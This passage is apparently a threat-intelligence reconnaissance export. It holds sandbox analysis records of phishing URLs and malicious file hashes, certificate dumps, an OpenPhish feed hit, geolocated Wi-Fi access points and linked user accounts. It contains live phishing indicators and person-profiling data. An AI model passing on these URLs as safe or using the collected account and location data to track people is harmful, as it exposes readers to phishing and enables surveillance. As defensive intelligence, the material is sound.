[targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00000736]\n "_084DCE00-250E-11ED-AA8D-080027808805_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF8A85CE863099679C.TMP" has type "data"- Location: [%TEMP%\\~DF8A85CE863099679C.TMP]- [targetUID: 00000000-00001256]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00001256]\n "50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF]- [targetUID: 00000000-00000736]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://lux7ury-bele5koy-77572a.netlify.app/_sa_product_specification_spec.pdf"- [Source: Input]\n Pattern match: "https://lux7ury-bele5koy-77572a.netlify.app"- [Source: Input]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.74.170.74": ...\n\n URL: http://brittanysdesigns.com/ (AV positives: 1/88 scanned on 08/26/2022 07:14:28)\n URL: http://musing-khorana-e13644.netlify.app/ (AV positives: 6/88 scanned on 08/26/2022 06:18:26)\n URL: https://ebroubank.netlify.app/ (AV positives: 17/88 scanned on 08/26/2022 04:50:57)\n URL: http://sneakerheads.cloud/ (AV positives: 2/88 scanned on 08/26/2022 04:00:52)\n URL: https://jrhunor.com/ (AV positives: 1/88 scanned on 08/26/2022 03:31:37)\n File SHA256: d73dc3a6ecca6902ac80046ef9a48ac136a4c7af203da1817e287fb54b64c147 (AV positives: 1/74 scanned on 08/23/2022 09:07:56)\n File SHA256: e4f875a727ff02309cdd1349884ee4d8313fb62719b1a15bfe795b6de56fbb37 (AV positives: 23/75 scanned on 08/20/2022 00:17:25)\n File SHA256: 0aff84aa363dd4cfaad6b77fd6ee53bd542a7a4067a9c9d8b3bd541f362e6443 (AV positives: 1/74 scanned on 08/18/2022 13:09:18)\n File SHA256: 3cbad8805eb55852f462a60a82f56f6ff267f2180af5fc40607838e97b58111e (AV positives: 10/75 scanned on 08/15/2022 23:57:10)\n File SHA256: 53b6bcc44935e6141356b24f7e68b4970457269119a206c0a0b5d731f2e556d4 (AV positives: 6/74 scanned on 07/31/2022 22:52:37)\n File SHA256: faa32adb3d32d68cd8bc667b146e874a96cb4469d8e5dbbe4122216b9771bd2e (Date: 11/17/2019 03:18:46)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'10/88 Antivirus vendors marked sample as malicious (11% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'63088b430ab94550560941eb', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.74.170.74'], u'sha256': u'8d65ee6c3d3e29e2405c7de07ca0dbc6a3c42dfa8e6cfd38e0d683284459d33f', u'sha512': u'5c037da9eaca7b7f4d877909d4bb53191a10022e56763aaa6dd9200e3d1bbaa906a2ccc48af2f5e8f197c49209339b12c5756e2c156645477688af7e4cd3c156', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://lux7ury-bele5koy-77572a.netlify.app/_sa_product_specification_spec.pdf', u'submission_id': u'63088b430ab94550560941ec', u'created_at': u'2022-08-26T08:58:43+00:00', u'filename': None}], u'analysis_start_time': u'2022-08-26T08:58:44+00:00', u'tags': [u'phishing'], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 6, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'56f91aa4b860b6026632b490d88ce4af', u'network_mode': u'default', u'processes': [], u'sha1': u'574bf6eeb46291ad6338ea08d0467661215d2443', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Phishing site', u'environment_description': u'Windows 7 64 bit', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.74.170.74 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ad981cbd3140a-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0080004.github.io]
https://www.openphish.com/feed.txt | 0080004.github.io |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | w1r3L3ss (Net ID: 00:01:24:F3:0B:65) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:23 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:b3:d3:7f:a8:50:41:aa:70:38:c6:ab:16:2e:24:50:f9:66
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 29 13:55:16 2022 GMT
Not After : Mar 29 13:55:15 2023 GMT
Subject: CN=tiktok.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:tiktok.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Dec 29 14:55:17.050 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:28:6D:42:8E:49:9E:0C:06:C1:19:32:87:
BF:75:CE:80:8F:D6:EA:C5:3B:07:D6:4C:75:42:82:B7:
AF:11:51:87:02:21:00:AE:B6:AE:63:CB:FF:A9:BC:83:
A0:CB:D1:C6:02:EE:7B:8C:98:F1:37:20:95:B3:3D:3B:
1D:2E:39:2F:06:AF:D5
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 29 14:55:17.019 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:D9:21:B2:7A:EF:D8:EF:8A:6A:56:47:
07:FC:9B:67:B8:AE:3E:10:F9:AF:08:C7:4F:19:35:0D:
C5:86:2C:A0:FC:02:20:23:BD:B1:50:ED:06:FD:32:BC:
AE:E7:5A:20:25:B5:AF:2F:31:CA:1D:81:02:1B:A1:2C:
F3:DE:98:F2:29:F5:42
Signature Algorithm: sha256WithRSAEncryption
69:a8:61:13:18:01:a6:06:e2:eb:7a:7f:50:95:06:92:17:8d:
ca:63:d6:69:98:12:cf:b0:fa:ee:80:84:43:ff:f7:1f:35:fe:
72:06:36:88:ae:e4:77:27:a1:93:d1:eb:02:37:43:a8:e0:86:
61:58:2f:fd:b8:58:c4:fe:4d:1e:e7:cc:96:cf:0a:d5:16:48:
9f:46:b8:50:28:e1:ed:1e:1c:e8:de:90:ce:fd:33:bc:3a:3f:
eb:8c:75:a9:62:13:f7:4f:2b:08:b6:ff:b0:a0:90:34:79:dc:
8f:45:7a:05:74:fa:fc:67:dc:64:6a:b8:82:b5:d8:15:dc:e6:
30:a1:47:0a:e3:0b:70:53:63:1c:e4:bd:93:48:f8:f8:a9:29:
47:b8:8c:e0:2a:aa:34:51:c8:15:63:92:48:e4:5c:09:73:8c:
34:26:6a:c2:dd:6d:88:c9:62:37:c7:07:7b:a7:cb:0b:65:95:
3b:9c:ec:a8:8e:63:0a:23:39:ab:20:1d:fa:d0:19:f8:cd:6c:
5b:28:00:57:e4:27:6a:d2:8b:10:68:0f:2e:76:30:48:41:7b:
10:5a:d6:74:99:4a:28:13:dc:83:45:4c:b2:5e:dd:bc:a4:73:
29:47:2c:b2:ad:19:c4:e8:3c:a6:e9:8a:06:b9:d6:a7:ca:fd:
6d:cd:fb:dd
| battleb0t.xyz |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Picsart (Category: art)
https://picsart.com/u/baptistevauthey | baptistevauthey |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
0a:22:b1:e9:af:d4:a9:74:88:84:74:c6:0c:06:4e:88:44:eb:
3d:8b:ff:0f:67:9b:d9:59:64:93:86:9d:3a:67:d2:a0:3e:52:
6d:1c:e7:15:10:f3:f5:51:a1:19:bc:c1:17:81:af:6e:00:02:
2c:2b:94:b9:a1:29:49:0c:d6:a8:59:00:4b:47:60:f7:bf:4d:
a5:8e:dc:6c:e7:62:2f:6e:45:28:27:5d:0b:af:59:e7:df:13:
7b:cf:b2:a2:da:32:8d:b4:3a:0a:9a:bf:a9:4a:e7:ca:7c:b6:
03:94:66:c9:f3:4e:8b:df:cb:62:a9:c2:05:d7:41:e7:96:0d:
2f:fd:52:d1:77:82:07:ba:c9:49:53:9d:54:ee:70:d1:90:b1:
a3:cc:e7:9c:0c:45:e3:02:85:7d:b0:fb:ec:d0:7e:53:65:3b:
df:c8:91:a1:21:7f:e2:6c:76:54:71:ce:4e:bd:b9:b8:30:a1:
c2:bc:22:2f:5c:87:b2:76:87:ed:5e:2b:71:c5:82:1c:b7:14:
13:1b:f2:3d:0c:ee:c2:59:8f:7f:d2:9f:b0:78:9f:80:1f:ba:
8b:65:58:fc:3c:40:e8:02:39:06:f7:24:58:38:34:e0:0d:b2:
2e:8a:82:16:b9:ac:3d:73:4d:68:a6:f4:81:4c:48:22:6d:44:
3e:f3:16:30
|
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007hyno.github.io |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | U+Net149B-CHO (Net ID: 00:01:36:93:14:99) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | TF2 Backpack Examiner (Category: gaming)
http://www.tf2items.com/id/login/ | login |
| 2023-05-12 02:57:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': 41, u'compromised_hosts': [u'35.229.48.116'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://archiveforjam.netlify.app/static/srt/HiJO1-18.srt', u'signatures': [{u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "rundll32.exe" touched "Enhanced Storage Icon Overlay Handler Class" (Path: "HKCU\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 1 (GFS Unread Stub)" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{99FD978C-D287-4F50-827F-B2C658EDA8E7}\\INPROCSERVER32")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"ThemeApiConnectionRequest" (Indicator: "ThemeApiConnectionRequest") in Source: 00000000-00003484-0000003B-36197385'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SmartScreen_AppRepSettings_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\SmartScreen_ClientId_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\CommunicationManager_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\LRIEElevationPolicyMutex"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2440"\n "IsoScope_988_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "_SHuassist.mtx"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_988_IESQMMUTEX_0_331"\n "Local\\LRIEElevationPolicyMutex"\n "IsoScope_988_IESQMMUTEX_0_303"\n "CommunicationManager_Mutex"\n "IsoScope_988_IE_EarlyTabStart_0xe74_Mutex"\n "Local\\ZonesCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." (UID: 00000000-00003484)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." (UID: 00000000-00003484)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"~DF645655DB470F49DD.TMP" has type "data"- Location: [%TEMP%\\~DF645655DB470F49DD.TMP]- [targetUID: 00000000-00002440]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002440]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00002996]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002996]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002996]\n "HiJO1-18.srt.kcpvle5.partial" has type "UTF-8 Unicode text"- Location: [%USERPROFILE%\\Downloads\\HiJO1-18.srt.kcpvle5.partial]- [targetUID: 00000000-00002996]\n "~DFD6CAA9D81E87A12A.TMP" has type "data"- Location: [%TEMP%\\~DFD6CAA9D81E87A12A.TMP]- [targetUID: 00000000-00002440]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00002996]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002440]\n "L2R4NE1M.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L2R4NE1M.txt]- [targetUID: 00000000-00002996]\n "8864D121A6EBD5E6D0EFEDAB49B51A90" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\8864D121A6EBD5E6D0EFEDAB49B51A90]- [targetUID: 00000000-00002996]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002440]\n "50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\50CD3D75D026C82E2E718570BD6F44D0_B1DE96581F3C849467FFD06E0B2329FF]- [targetUID: 00000000-00002996]\n "OJK4RYGG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OJK4RYGG.txt]- [targetUID: 00000000-00002440]\n "B126BF247C927A243E186240F06A7849" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B126BF247C927A243E186240F06A7849]- [targetUID: 00000000-00002996]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-55', u'name': u'Touches files in the Windows directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 6, u'description': u'"rundll32.exe" touched file "%WINDIR%\\AppPatch\\sysmain.sdb"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-16', u'name': u'Connects to LPC ports', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rundll32.exe" connecting to "\\ThemeApiPort"'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-78', u'name': u'Contains ability to read software policies', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1082', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-312', u'attck_id': u'T1082', u'relevance': 1, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS"; Key: "TRANSPARENTENABLED")'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-13', u'name': u'Reads the windows installation date', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION"; Key: "INSTALLDATE")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /static/srt/HiJO1-18.srt HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: archiveforjam.netlify.app\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_35.229.48.116]\n\n "1daf\n\\Xr`Um|?~T@+NI,og\n43\'LCeI\\7u?F | 35.229.48.116 |
| 2023-05-12 02:56:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://rhombussystems.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rhombussystems.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': 